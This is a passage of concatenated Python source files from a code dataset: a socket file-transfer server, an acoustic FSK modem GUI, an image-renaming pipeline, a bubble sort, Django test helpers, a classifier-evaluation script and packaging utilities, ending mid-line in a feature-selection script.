universal_newlines=False,\n            stderr=subprocess.STDOUT,\n            stdout=subprocess.PIPE).stdout.read()\n        send_data(data_ip, data_port, ls_data)\n        # Send a 520 Success\n        send_msg(sock_cli, MSG_520)\n        return True\n    else:\n        # Don't list the path. It's not under PWD\n        send_data(data_ip, data_port, \"Permission denied!\\n\".encode())\n        send_msg(sock_cli, MSG_390 %(path))\n        return False\n
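# put() above depends on recv_block() from the common module, which is not
# shown in this file. A typical implementation -- sketched here as an
# assumption about what common provides -- loops on recv() until exactly
# `length` bytes have arrived, returning None if the peer hangs up early:
def recv_block(sock, length):
    chunks = []
    remaining = length
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:  # peer closed the connection mid-transfer
            return None
        chunks.append(chunk)
        remaining -= len(chunk)
    return b''.join(chunks)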
\n# GET command\ndef get(params, data_ip):\n    global sock_data\n    if len(params) < 4:\n        send_msg(sock_cli, MSG_800)\n        return False\n    data_port = int(params[2])\n    filename = params[3]\n    if check_file(filename):\n        info(\"Your file has been found\")\n        fo = open(filename, mode='rb')\n        filesize = os.stat(filename).st_size\n        # MAX_BYTES should be used here instead of 512\n        bytes_read = fo.read(512)\n        # Connect to the client's data socket\n        sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        debug(\"[send_data] Attempting to connect to %s:%d\" %(data_ip, data_port))\n        sock_data.connect((data_ip, data_port))\n        debug(\"[send_data] Success!\")\n        # Send 510 with data length\n        send_msg(sock_cli, MSG_510 % filesize)\n        bytes_sent = 0\n        while (bytes_sent < filesize):\n            # Send data\n            sock_data.sendall(bytes_read)\n            bytes_sent += len(bytes_read)\n            bytes_read = fo.read(512)\n        fo.close()\n        # Send a 520 Success\n        send_msg(sock_cli, MSG_520)\n        sock_data.close()\n        return True\n    else:\n        info(\"[get] Not a file, or you're not allowed to look in this path\")\n        send_data(data_ip, data_port, \"\".encode())\n        send_msg(sock_cli, MSG_190 %(filename))\n        return False\n\ndef handle_session(addr):\n    info(\"[handle_session] Handling connection from %s:%d\" %(addr[0], addr[1]))\n    while True:\n        message = recv_msg(sock_cli)\n        if message is None or len(message) < 1:\n            # Gracefully terminate\n            sock_cli.close()\n            break\n        elif message[0] == \"200\":\n            # PUT\n            put(message, addr[0])\n        elif message[0] == \"300\":\n            # LS\n            ls(message, addr[0])\n        elif message[0] == \"800\":\n            # What you say!!\n            pass\n        elif message[0] == \"900\":\n            # BYE message. Quit.\n            sock_cli.close()\n            break\n        elif message[0] == \"100\":\n            # GET\n            get(message, addr[0])\n        else:\n            # Send the 800 response (What you say!!)\n            send_msg(sock_cli, MSG_800)\n\ndef main():\n    global sock_welcome, sock_cli, server_ip, server_port, is_worker, conn_workers\n\n    # Parse CLI parameters\n    if len(sys.argv) < 2: usage()\n    elif len(sys.argv) == 2:\n        server_port = int(sys.argv[1])\n    elif len(sys.argv) >= 3:\n        server_ip = sys.argv[1]\n        server_port = int(sys.argv[2])\n\n    # Create the welcome socket\n    sock_welcome = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock_welcome.bind((server_ip, server_port))\n    sock_welcome.listen(1)\n\n    info(\"[main] Listening on %s:%d\" %(server_ip, server_port))\n\n    # Accept connections\n    while True:\n        info(\"[main] Awaiting connection...\")\n        try:\n            sock_cli, addr = sock_welcome.accept()\n        except (InterruptedError):\n            continue\n        info(\"[main] Accepted connection from %s:%d\" %(addr[0], addr[1]))\n        # This is where you and the client talk\n        pid_child = os.fork()\n        if pid_child == 0:\n            # Child\n            is_worker = True\n            conn_workers = set()\n            handle_session(addr)\n            sys.exit(0)\n        else:\n            # Parent\n            conn_workers.add(pid_child)\n            info(\"[main] Forking child PID %d\" %(pid_child))\n\n# Clean things up before terminating\ndef shutdown(kill_children=False):\n    info(\"[shutdown] Shutting down...\")\n    if is_worker:\n        if sock_cli is not None: sock_cli.close()\n        if sock_data is not None: sock_data.close()\n    else:\n        if(kill_children):\n            info(\"[shutdown] Killing child workers\")\n            # Turn off child reaping b/c we do it here.\n            signal.signal(signal.SIGCHLD, signal.SIG_DFL)\n            for pid in conn_workers:\n                info(\"[shutdown] Sending SIGTERM to %d\" %(pid))\n                os.kill(pid, signal.SIGTERM)\n                os.waitpid(pid, 0)\n        if sock_welcome is not None: sock_welcome.close()
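# get() above streams the file in fixed 512-byte reads; its own comment notes
# that a MAX_BYTES constant would be cleaner. The same loop factored into a
# helper -- the MAX_BYTES name and value are assumptions mirroring that TODO,
# not something defined in this file:
MAX_BYTES = 4096

def send_file(sock, filename):
    with open(filename, 'rb') as fo:
        while True:
            block = fo.read(MAX_BYTES)
            if not block:  # EOF: the whole file has been sent
                break
            sock.sendall(block)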
\n\n# Signal handlers\ndef handle_kill(sig, frame):\n    info(\"[handle_kill] Received signal %d.\" %(sig))\n    # This will actually raise an exception, which throws control\n    # back to shutdown (see the end of the file).\n    sys.exit(0)\ndef reap_children(sig, frame):\n    # See the os.waitpid() documentation on reaping children with WNOHANG.\n    while True:\n        try:\n            status = os.waitpid(-1, os.WNOHANG)\n            pid = status[0]\n            if pid <= 0:\n                break\n            conn_workers.discard(pid)\n            info(\"[reap_children] reaping PID %d\" %(pid))\n        except(ChildProcessError):\n            break\nsignal.signal(signal.SIGTERM, handle_kill)\nsignal.signal(signal.SIGQUIT, handle_kill)\nsignal.signal(signal.SIGHUP, handle_kill)\nsignal.signal(signal.SIGCHLD, reap_children)\n\nif __name__ == \"__main__\":\n    try: main()\n    except(KeyboardInterrupt):\n        # KeyboardInterrupt exits normally\n        # The KeyboardInterrupt propagates to all children\n        shutdown(kill_children=False)\n    except:\n        # Everything else is an error and should print a stackdump\n        # (Except for sys.exit(0), which also dumps control here)\n        shutdown(kill_children=True)\n        raise\n","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}{"seq_id":"577805404","text":"import sys\nimport wave\nfrom threading import Thread\n\nimport numpy as np\nimport scipy.io as sio\nfrom PyQt5.QtCore import QThread\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nimport pyaudio\nfrom scipy.io.wavfile import write\nimport sounddevice as sd\nimport time\nimport scipy.io.wavfile as wav\nimport soundfile as sf\nfrom Messages import msgButtonClick, showDialog\nfrom scipy import signal\nimport operator\nimport csv\nimport math\nform_class = uic.loadUiType(\"gui_for_translate.ui\")[0]\n\nsampling_rate = 48000\nsymbol_duration = 0.025\nf = 4000\nN = sampling_rate * symbol_duration\nTs = 1 / sampling_rate\nFILENAME = \"tmp.wav\"\npreamble = '01010101010101010101'\n\npreamble_signal = ','.join(list(preamble))\npreamble_time_signal = N * len(preamble) / sampling_rate\npreamble_t = np.arange(0, preamble_time_signal, Ts)\npreamble_np_signal = np.fromstring(preamble_signal, dtype='int', sep=',')\npreamble_sample = np.repeat(preamble_np_signal, N)\npreamble_y = np.sin(2 * np.pi * (f + preamble_sample * 2000) * preamble_t)\n\n\ndef encode_c(s):\n    return ''.join([bin(ord(c)).replace('0b', '') for c in s])\n\n\ndef decode_c(s):\n    return ''.join([chr(i) for i in [int(b, 2) for b in s.split(' ')]])\n\n\nclass ThreadClass(QThread):\n    def __init__(self):\n        super().__init__()\n\n    def run(self):\n        global flag\n        flag = 0\n        FORMAT = pyaudio.paInt16\n        CHANNELS = 1\n        frames = []\n\n        p = pyaudio.PyAudio()\n        stream = p.open(format=FORMAT,\n                        channels=CHANNELS,\n                        rate=sampling_rate,\n                        input=True,\n                        output=True,\n                        frames_per_buffer=int(N))\n\n        while 1:\n            if flag == 0:\n                data = stream.read(int(N))\n                frames.append(data)\n            else:\n                break\n        stream.stop_stream()\n        stream.close()\n        p.terminate()\n        wf = wave.open(FILENAME, \"wb\")\n        wf.setnchannels(CHANNELS)\n        wf.setsampwidth(p.get_sample_size(FORMAT))\n        wf.setframerate(sampling_rate)\n        wf.writeframes(b\"\".join(frames))\n        wf.close()\n
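# How the modulated signal above is built, shown on shrunken numbers so the
# arrays are easy to inspect: each bit of <preamble><8-bit length><payload>
# is repeated N times (N = samples per symbol) and mapped to one of two
# carriers, f for a 0 bit and f + 2000 Hz for a 1 bit -- simple binary FSK.
# The toy sample rate and frequencies here are assumptions for illustration.
import numpy as np

fs = 8                     # toy sample rate
N = 4                      # samples per symbol
f = 2                      # base carrier frequency, Hz
payload = '1001101'        # 7-bit ASCII for 'M'
header = format(len(payload), 'b').zfill(8)       # 8-bit length field
bits = np.array([int(b) for b in '0101' + header + payload])  # short preamble
t = np.arange(0, len(bits) * N / fs, 1 / fs)
sample = np.repeat(bits, N)                       # N samples per bit
y = np.sin(2 * np.pi * (f + sample * 2000) * t)
print(header, sample[:8], y.shape)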
\n\nclass WindowClass(QMainWindow, form_class):\n    def __init__(self):\n        super().__init__()\n        self.setupUi(self)\n        self.encode_button.clicked.connect(self.encode)\n        #self.decode_button.clicked.connect(self.decode)\n        self.start_record.clicked.connect(self.recording)\n        self.stop_record.clicked.connect(self.stop_recording)\n        self.threadclass = ThreadClass()\n\n    def decode(self):\n        display_result = ''\n        filtedData = []\n        current_length = 0\n        current_data = []\n        data = []\n        flag = 0\n        impulse_fft = []\n        impulse_fft_tmp = []\n        bin = []\n        real = []\n        self.decode_text.setPlainText(''.join(real))\n\n        bandpass1 = 3000\n        bandpass2 = 7000\n        read_signal, fs = sf.read(FILENAME)\n\n        wn1 = 2.0 * bandpass1 / sampling_rate\n        wn2 = 2.0 * bandpass2 / sampling_rate\n        b, a = signal.butter(8, [wn1, wn2], 'bandpass') # the passband may need to be slightly wider\n        filtedData = signal.filtfilt(b, a, read_signal) # filter the recorded signal\n\n        current_length = len(filtedData)\n        current_data = filtedData\n        while 1:\n            once_check = 0\n            corr = []\n            corr_index = dict()\n\n            print('finding preamble')\n            print('current_data length',len(current_data))\n            for i in range(current_length - len(preamble_y)):\n                corr.append(np.corrcoef(current_data[i:i + len(preamble_y)], preamble_y)[0, 1])\n                if once_check + 24000 == i and once_check != 0:\n                    print('corr search window exhausted')\n                    break\n\n                if corr[i] > 0.5:\n                    if once_check == 0:\n                        once_check = i\n                        print('once_check',once_check)\n\n                    corr_index[i] = corr[i]\n\n            try:\n                flag = max(corr_index.items(), key=operator.itemgetter(1))[0]\n            except:\n                print('decode finished')\n                break\n\n            print(flag)\n            data = current_data[flag + len(preamble_y):flag + len(preamble_y)+60000]\n\n            target_fre = 6000\n            n = len(data)\n            window = 600\n            impulse_fft = np.zeros(n)\n            for i in range(int(n - window)):\n                y = np.fft.fft(data[i:i + int(window) - 1])\n                y = np.abs(y)\n                index_impulse = round(target_fre / sampling_rate * window)\n                impulse_fft[i] = max(y[index_impulse - 2:index_impulse + 2])\n\n            sliding_window = 5\n            impulse_fft_tmp = impulse_fft\n            for i in range(1 + sliding_window, n - sliding_window):\n                impulse_fft_tmp[i] = np.mean(impulse_fft[i - sliding_window:i + sliding_window])\n            impulse_fft = impulse_fft_tmp\n\n            #\n            #\n            # position_impulse = [];\n            # half_window = 800;\n            #\n            #\n            #\n            # for i in range(n-half_window*2):\n            #     if impulse_fft[i+half_window] > 90 and impulse_fft[i+half_window] == max(impulse_fft[i - half_window: i + half_window]):\n            #         position_impulse.append(i)\n            # message_bin = np.zeros(230400)\n            # for i in range(len(position_impulse)):\n            #     message_bin[math.ceil(position_impulse / 4800)] = 1\n            # real_message_start = 1\n            # last_one_index = 1\n            # for i in range(3):\n            #     if message_bin[i] == 1:\n            #         last_one_index = i\n            #\n            # real_message_start = last_one_index + 1\n            #\n            # real_message_bin = message_bin[real_message_start:230400]\n            #\n            # curr_package_index = 0\n            # curr_bin_index = 1\n            # real_message_bin = np.matrix.H(real_message_bin)\n\n            plus = 0\n            adjust = 0\n            count = 0\n            while 1:\n                decode_length = ''\n                if adjust == 1:\n                    plus += 0.1\n                    print(plus)\n                for i in range(8):\n                    bin = np.mean(impulse_fft[i * 1200:(i + 1) * 1200])\n                    bin += plus\n                    print(bin)\n                    if bin < 5:\n                        decode_length = decode_length + '0'\n                    else:\n                        decode_length = decode_length + '1'\n\n                print(decode_length)\n                decode_payload_length = int(decode_length, 2)\n                count += 1\n                if count == 40:\n                    break\n                if decode_payload_length != 35:\n                    adjust = 1\n                else:\n                    break\n\n            if count == 40:\n                decode_length = ''\n\n                for i in range(8):\n                    bin = np.mean(impulse_fft[i * 1200:(i + 1) * 1200])\n                    print(bin)\n                    if bin < 3:\n                        decode_length = decode_length + '0'\n                    else:\n                        decode_length = decode_length + '1'\n\n                print(decode_length)\n                decode_payload_length = int(decode_length, 2)\n                adjust = 0\n\n                decode_payload = ''\n                for i in range(decode_payload_length):\n                    bin = np.mean(impulse_fft[(i + 8) * 1200:(i + 1 + 8) * 1200])\n\n                    if bin < 3:\n                        decode_payload = decode_payload + '0'\n                    else:\n                        decode_payload = decode_payload + '1'\n                    print(bin)\n            else:\n                decode_payload = ''\n                for i in range(decode_payload_length):\n                    bin = np.mean(impulse_fft[(i + 8) * 1200:(i + 1 + 8) * 1200])\n\n                    if adjust == 1:\n                        bin += plus\n                    if bin < 5:\n                        decode_payload = decode_payload + '0'\n                    else:\n                        decode_payload = decode_payload + '1'\n                    print(bin)\n\n            print(decode_payload)\n            while 1:\n                if len(decode_payload) % 7 != 0:\n                    decode_payload = decode_payload + '0'\n                else:\n                    break\n\n            print(1200*(int(decode_length,2)+8))\n            current_data = current_data[1200*(int(decode_length,2)+8+20)+flag:len(current_data)]\n            current_length = len(current_data)\n            display_result = display_result + decode_payload\n\n        real = []\n        for i in range(int(len(display_result) / 7)):\n            real.append(decode_c(display_result[i * 7:(i + 1) * 7]))\n        print(real)\n        self.decode_text.setPlainText(''.join(real))\n\n        print('result:',''.join(real))\n        global start\n        cost_time = \"time:\" + str(time.time() - start) + '\\n'\n        decode_payload = decode_payload + '\\n'\n\n        file = open(\"result_translate.txt\", 'w')\n        file.write(cost_time)\n        file.write(decode_payload)\n        file.write(''.join(real))\n        file.close()\n
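# The preamble search in decode() above slides a window over the filtered
# recording and scores each offset with np.corrcoef against the known
# preamble waveform, keeping the best-correlated position. The same idea in
# a compact, self-contained form:
import numpy as np

def find_preamble(sig, preamble, threshold=0.5):
    best_idx, best_corr = -1, threshold
    for i in range(len(sig) - len(preamble)):
        c = np.corrcoef(sig[i:i + len(preamble)], preamble)[0, 1]
        if c > best_corr:
            best_idx, best_corr = i, c
    return best_idx  # -1 means no window cleared the threshold

rng = np.random.default_rng(0)
pre = np.sin(np.linspace(0, 20 * np.pi, 200))
noisy = rng.normal(0, 0.2, 1000)
noisy[300:500] += pre                 # bury the preamble at offset 300
print(find_preamble(noisy, pre))      # close to 300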
\n    def recording(self):\n        global start\n        start = time.time()\n\n        print('recording....')\n        self.threadclass.start()\n\n    def stop_recording(self):\n        global flag\n        flag = 1\n        print('stop!!!')\n        time.sleep(1)\n        self.decode()\n\n    def encode(self):\n        input_text = encode_c(self.encode_text.toPlainText())\n        if input_text == '':\n            msgBox = QMessageBox()\n            msgBox.setIcon(QMessageBox.Information)\n            msgBox.setText(\"Input must not be empty\")\n            msgBox.setWindowTitle(\"System warning\")\n            msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n            msgBox.buttonClicked.connect(msgButtonClick)\n            returnValue = msgBox.exec()\n            if returnValue == QMessageBox.Ok:\n                return\n        length = 35\n        temp = [input_text[i:i + length] for i in range(0, len(input_text), length)]\n        for i in range(len(temp)):\n            length_payload = str(format(len(temp[i]), 'b')) # binary length header, zero-padded to 8 bits below\n            if len(length_payload) < 8:\n                length_payload = length_payload.zfill(8)\n            print(temp[i])\n            total = preamble + length_payload + temp[i]\n            signal = ','.join(list(total))\n            time_signal = N * len(total) / sampling_rate\n            t = np.arange(0, time_signal, Ts)\n            np_signal = np.fromstring(signal, dtype='int', sep=',')\n            sample = np.repeat(np_signal, N)\n            if (len(t) % 10) != 0:\n                t = t[:len(t) - 1]\n            y = np.sin(2 * np.pi * (f + sample * 2000) * t)\n            write('first.wav', sampling_rate, y)\n            samplerate, data = sio.wavfile.read('first.wav')\n            sd.play(data, samplerate)\n            time.sleep(time_signal + 1)\n\n    def window(self):\n        app = QApplication(sys.argv)\n        win = QWidget()\n        button1 = QPushButton(win)\n        button1.setText(\"Show dialog!\")\n        button1.move(50, 50)\n        button1.clicked.connect(showDialog)\n        win.setWindowTitle(\"Click button\")\n        win.show()\n        sys.exit(app.exec_())\n\n    def msgButtonClick(self, i):\n        print(\"Button clicked is:\", i.text())\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n\n    myWindow = WindowClass()\n\n    myWindow.show()\n\n    app.exec_()\n\n\n","sub_path":"传输系统性能测试/translater.py","file_name":"translater.py","file_ext":"py","file_size_in_byte":11614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}{"seq_id":"449331027","text":"\"\"\"\nPipeline practice to rename image files.\n\"\"\"\n\nimport os\n\n\ndef walk_to_level(path, level=None):\n    if level is None:\n        yield from os.walk(path)\n        return\n\n    path = path.rstrip(os.path.sep)\n    num_sep = 
path.count(os.path.sep)\n for root, dirs, files in os.walk(path):\n yield root, dirs, files\n num_sep_this = root.count(os.path.sep)\n if num_sep + level <= num_sep_this:\n # When some directory on or below the desired level is found, all\n # of its subdirs are removed from the list of subdirs to search next.\n # So they won't be walked.\n del dirs[:]\n\n\ndef list_files(path, valid_exts=None, level=None, contains=None):\n \"\"\"Loop over the input directory structure.\"\"\"\n for (root_dir, dir_names, filenames) in walk_to_level(path, level):\n for filename in sorted(filenames):\n # ignore the file if not contains the string\n if contains is not None and contains not in filename:\n continue\n\n # Determine the file extension of the current file\n ext = filename[filename.rfind(\".\") :].lower()\n if valid_exts and ext.endswith(valid_exts):\n # Construct the path to the file and yield it\n file = os.path.join(root_dir, filename)\n yield file\n\n\nclass Pipeline:\n \"\"\"Abstract base class for building pipelines.\"\"\"\n\n def __init__(self):\n self.source = None\n\n def __iter__(self):\n return self.generator()\n\n def generator(self):\n while self.has_next():\n data = next(self.source) if self.source else {}\n if self.filter(data):\n yield self.map(data)\n\n def __or__(self, other):\n other.source = self.generator()\n return other\n\n def filter(self, data):\n return True\n\n def map(self, data):\n return data\n\n def has_next(self):\n return True\n\n\nclass RenameImages(Pipeline):\n def __init__(self, src, valid_exts=(\".jpg\", \".png\")):\n self.src = src\n self.valid_exts = valid_exts\n\n super(RenameImages, self).__init__()\n\n def generator(self):\n source = list_files(self.src, self.valid_exts)\n\n while self.has_next():\n old = next(source)\n\n old_path, old_ext = os.path.splitext(old)\n old_name = old_path.split(\"/\")[-1]\n\n class_name = old_name.split()[0]\n img_id = old_name.split()[2].zfill(4)\n new_name = f\"{class_name}-{img_id}\"\n\n new_path = os.path.join(self.src, new_name)\n new = f\"{new_path}{old_ext}\"\n\n print(f\"{old}\")\n print(f\"{new}\")\n data = new_path\n\n os.rename(old, new_path)\n\n if self.filter(data):\n yield self.map(data)\n\n\n# class Printer(Pipeline):\n# def map(self, value):\n# print(value)\n# return value\n\n\ndef main(img_path):\n rename = RenameImages(img_path)\n # printer = Printer()\n\n pipeline = rename\n\n for i in pipeline:\n pass\n\n\nif __name__ == \"__main__\":\n main(\"/Users/Tobias/workshop/buildbox/forecut/assets_/images\")\n","sub_path":"scripts/file_rename_pipe.py","file_name":"file_rename_pipe.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605138438","text":"nums = [6, 5, 3, 1, 8, 7, 2, 4]\n# nums = [1, 2, 3, 4, 5, 6, 7, 9, 8]\n# 比较次数\ncount = 0\nj = 0\nwhile j < len(nums) - 1:\n # 在每一趟里都定义一个flag\n flag = True # 假设该趟没有发生交换\n i = 0\n while i < len(nums) - 1 - j:\n count += 1\n if nums[i] > nums[i + 1]:\n # 只要交换了,假设就不成立\n flag = False\n nums[i], nums[i + 1] = nums[i + 1], nums[i]\n i += 1\n if flag:\n # 这一趟走完以后,flag依然是True,说明这一趟没有进行过交换数据\n break\n j += 1\nprint(nums)\nprint(count)\n","sub_path":"study01/day04/02-冒泡排序优化.py","file_name":"02-冒泡排序优化.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511276372","text":"from base64 import b64encode\n\nfrom django.contrib.auth.models import User\n\n\nadmin_test_credentials = ('admin1', 
'admin@taverna.com', 'qwerty123',)\nnormal_user_credentials = ('user1', 'user1@taverna.com', 'qwerty123',)\nendpoint = '/api'\n\n\ndef obtain_api_key(client):\n    credentials = '{}:{}'.format(\n        admin_test_credentials[0],\n        admin_test_credentials[2]\n    )\n    b64_encoded_credentials = b64encode(credentials.encode('utf-8'))\n    return client.post(\n        '/api/api_key',\n        **{'HTTP_AUTHORIZATION': 'Basic %s' % b64_encoded_credentials.decode('utf-8')}\n    ).json()['api_key']\n\n\ndef create_admin_account():\n    return User.objects.create_superuser(*admin_test_credentials)\n\n\ndef create_normal_user_acount():\n    return User.objects.create_user(*normal_user_credentials)\n\n\ndef make_request(client, query, method='GET'):\n    header = {\n        'HTTP_X_TAVERNATOKEN': obtain_api_key(client)\n    }\n\n    if method == 'GET':\n        return client.get(endpoint, data={'query': query}, **header).json()\n\n    if method == 'POST':\n        return client.post(endpoint, data={'query': query}, **header).json()\n","sub_path":"app/api/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}{"seq_id":"599533390","text":"# -*- coding: UTF-8 -*-\n'''\n@author: xuqiang\n'''\nimport tensorflow as tf\nimport os\nimport numpy as np\nimport glob\n\n# nameAndPositon = {'orange':'0','apple':'1','one':'2','zebra':'3','chinese':'5','oil':'6','many':'7'}\n# print(nameAndPositon.keys())\n\n'''\nExtract the source and target class names from a folder name.\n'''\n# name = \"oiltochinese-15-15-test\"\n# values = name.split(\"to\")\n# first = values[0]\n# second = values[1].split(\"-\")[0]\n# print(first)\n# print(second)\n# print(nameAndPositon[first])\n\ndef getOneImgClassifyProb(sess,imageToTensorPath):\n    # chkName = tf.train.latest_checkpoint('E:/tensorflow/selfmodelclassify/')\n    # saver = tf.train.import_meta_graph(chkName + '.meta')\n    # saver.restore(sess, tf.train.latest_checkpoint('E:/tensorflow/selfmodelclassify/'))\n    with open(imageToTensorPath,'r') as bottleneck_file:\n        bottleneck_string = bottleneck_file.read()\n    bottleneck_values = [float(x) for x in bottleneck_string.strip().split(',')]\n    bottleneck_values_reshape = np.reshape(bottleneck_values, [-1, 2048])\n    graph = tf.get_default_graph()\n    input = graph.get_tensor_by_name(\"BottleneckInputPlaceholder:0\")\n    w1 = graph.get_tensor_by_name(\"final_training_ops/op_to_prob:0\")\n    feed_dict = {input: bottleneck_values_reshape}\n    prob = sess.run(w1, feed_dict)\n    return prob\n\ndef getListImgClassifyProb(sess,imageList):\n    listLen = len(imageList)\n    totalImgProb = np.zeros(8)\n    for imgPath in imageList:\n        oneImgProb = getOneImgClassifyProb(sess,imgPath)\n        totalImgProb = np.add(totalImgProb,oneImgProb)\n    return np.divide(totalImgProb,listLen)\n
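# getListImgClassifyProb() above computes the element-wise mean of the
# per-image class-probability vectors: accumulate with np.add, then divide
# by the number of images. The same arithmetic in isolation:
import numpy as np

probs = np.array([[0.7, 0.2, 0.1],
                  [0.5, 0.4, 0.1],
                  [0.6, 0.3, 0.1]])
total = np.zeros(3)
for p in probs:                      # mirrors the accumulate loop above
    total = np.add(total, p)
avg = np.divide(total, len(probs))
print(avg)                           # [0.6 0.3 0.1]
assert np.allclose(avg, probs.mean(axis=0))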
\ndef main(input_data_tensor_valuation_path):\n    nameAndPositon = {'orange': '0', 'apple': '1', 'one': '2', 'zebra': '3','horse':'4','chinese': '5', 'oil': '6', 'many': '7'}\n    sub_dirs = [x[0] for x in os.walk(input_data_tensor_valuation_path)]\n    is_root_dir = True\n    for sub_dir in sub_dirs:\n        if is_root_dir:\n            is_root_dir = False\n            continue\n        base_name = os.path.basename(sub_dir)\n        file_name_apart = base_name.split(\"to\")\n        first_name = file_name_apart[0]\n        second_name = file_name_apart[1].split(\"-\")[0]\n        prefixs = ['fakeA','fakeB']\n        file_list = {}\n        for prefix in prefixs:\n            file_glob = os.path.join(input_data_tensor_valuation_path,base_name,prefix+'*')\n            file_list[prefix] = glob.glob(file_glob)\n\n        fakeA_img_list = file_list['fakeA']\n        fakeB_img_list = file_list['fakeB']\n        print(base_name + \" folder contains \" + str(len(fakeA_img_list)+len(fakeB_img_list)) + \" images in total\")\n\n        with tf.Session() as sess:\n            chkName = tf.train.latest_checkpoint('E:/tensorflow/selfmodelclassify/')\n            saver = tf.train.import_meta_graph(chkName + '.meta')\n            saver.restore(sess, tf.train.latest_checkpoint('E:/tensorflow/selfmodelclassify/'))\n            fakeA_img_average_prob = getListImgClassifyProb(sess,fakeA_img_list)\n            fakeB_img_average_prob = getListImgClassifyProb(sess,fakeB_img_list)\n            # print(fakeA_img_average_prob)\n            # print(fakeB_img_average_prob)\n            positionA = int(nameAndPositon[first_name])\n            positionB = int(nameAndPositon[second_name])\n            print(base_name + \": average accuracy of fakeA images = \" + str(fakeA_img_average_prob[0][positionB]))\n            print(base_name + \": average accuracy of fakeB images = \" + str(fakeB_img_average_prob[0][positionA]))\n            print(\"++++++++++++++++++++++++++++++++++\")\n            with open(input_data_tensor_valuation_path+'avgAccOutput.txt','a') as f:\n                f.write(base_name + \": average accuracy of fakeA images = \" + str(fakeA_img_average_prob[0][positionB]) + \"\\n\" +\n                        base_name + \": average accuracy of fakeB images = \" + str(fakeB_img_average_prob[0][positionA]) + \"\\n\\n\")\n\n\nif __name__ == \"__main__\":\n    # list1 = np.zeros(8)\n    # list2 = [2.83964584e-03,7.56550930e-04,6.08784103e-06,3.81935941e-04,1.47359213e-04,7.49921858e-01,2.45923772e-01,2.27466589e-05]\n    # print(list1)\n    # addTo = np.add(list1, list2)\n    # print(addTo)\n    # print(np.divide(addTo,2))\n\n    # input_data_tensor_valuation_path = 'F:/converImgtoTensor/tensor-valuation/'\n    input_data_tensor_valuation_path = 'F:/converImgtoTensor/adding/tensor-valuation/'\n    main(input_data_tensor_valuation_path)\n","sub_path":"src/demo/section6-cnn/fineTune/calculateAverageOfClassifyAcc-original.py","file_name":"calculateAverageOfClassifyAcc-original.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}{"seq_id":"224098246","text":"# Copyright (C) 2020 Simon Biggs\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport pathlib\n\nimport tomlkit\n\nPYPROJECT_TOML_PATH = (\n    pathlib.Path(__file__).resolve().parent.parent.joinpath(\"pyproject.toml\")\n)\n\n\ndef main():\n    with open(PYPROJECT_TOML_PATH) as f:\n        pyproject_contents = tomlkit.loads(f.read())\n\n    deps = pyproject_contents[\"tool\"][\"poetry\"][\"dependencies\"]\n\n    extras = {}\n\n    for key in deps:\n        value = deps[key]\n        comment = value.trivia.comment\n\n        if comment.startswith(\"# groups\"):\n            split = comment.split(\"=\")\n            assert len(split) == 2\n            groups = json.loads(split[-1])\n\n            for group in groups:\n                try:\n                    extras[group].append(key)\n                except KeyError:\n                    extras[group] = [key]\n\n    pyproject_contents[\"tool\"][\"poetry\"][\"extras\"] = extras\n\n    with open(PYPROJECT_TOML_PATH, \"w\") as f:\n        f.write(tomlkit.dumps(pyproject_contents))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"scripts/propagate-extras.py","file_name":"propagate-extras.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"489300890","text":"import numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import KFold\nfrom sklearn import svm\n\n\ndef load_csv_data(filename):\n    data = []\n    labels = []\n    datafile = open(filename)\n    for line in datafile:\n        fields = line.strip().split(',')\n        data.append([float(field) for field in fields[:-1]])\n        labels.append(int(fields[-1]))\n    data = np.array(data)\n    labels = np.array(labels)\n    return data, labels\n\n\ndef judge_zero(feature, n):\n    for i in range(n):\n        if feature[i] == 1:\n            return 0\n    return 1\n\ndef gen_feat_data(feature, n, data):\n    if judge_zero(feature, n) == 1: # if all bits are 0, keep the full feature set\n        return data\n    new_data = []\n    nd = len(data)\n    for i in range(nd):\n        temp_data = []\n        for j in range(n):\n            if feature[j] == 1:\n                temp_data.append(data[i][j])\n        new_data.append(temp_data)\n    new_data = np.array(new_data)\n    return new_data\n\n\ndef accuracy(test_labels, pred_labels):\n    n = len(test_labels)\n    correct = 0\n    for i in range(n):\n        if test_labels[i] == pred_labels[i]:\n            correct += 1\n    return float(correct) / n\n\n\ndef cal_fitvalue(data, labels, op): # op=1: 3-NN; op=2: 5-NN; op=3: RBF SVM; op=4: 1-NN\n    if op == 1:\n        model = KNeighborsClassifier(n_neighbors = 3)\n    elif op == 2:\n        model = KNeighborsClassifier(n_neighbors = 5)\n    elif op == 3:\n        model = svm.SVC(kernel='rbf', gamma='auto')\n    elif op == 4:\n        model = KNeighborsClassifier(n_neighbors = 1)\n    kf = KFold(n_splits = 10, shuffle = True)\n    result_set = [(model.fit(data[train], labels[train]).predict(data[test]), test) for train, test in 